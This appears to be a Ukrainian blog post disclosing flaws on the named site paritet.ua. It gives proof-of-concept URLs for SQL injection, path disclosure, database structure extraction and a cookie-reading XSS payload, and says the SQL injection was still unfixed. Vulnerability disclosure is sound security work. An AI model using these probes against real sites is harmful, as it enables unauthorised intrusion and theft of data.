Websecurity - Веб безпека

07.10.2009

У лютому, 08.02.2009, я знайшов SQL Injection, Full path disclosure, SQL DB Structure Extraction та Cross-Site Scripting уразливості на сайті http://www.paritet.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

09.04.2010

SQL Injection:

http://www.paritet.ua/?mid=9%20and%20version()=5

Full path disclosure:

http://www.paritet.ua/?mid=-1

SQL DB Structure Extraction:

http://www.paritet.ua/?mid=-1′

XSS:

http://www.paritet.ua/?mid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості вже виправлені. Окрім SQL Injection уразливості, що дуже несерйозно.

This entry was posted on 19:04 09.04.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.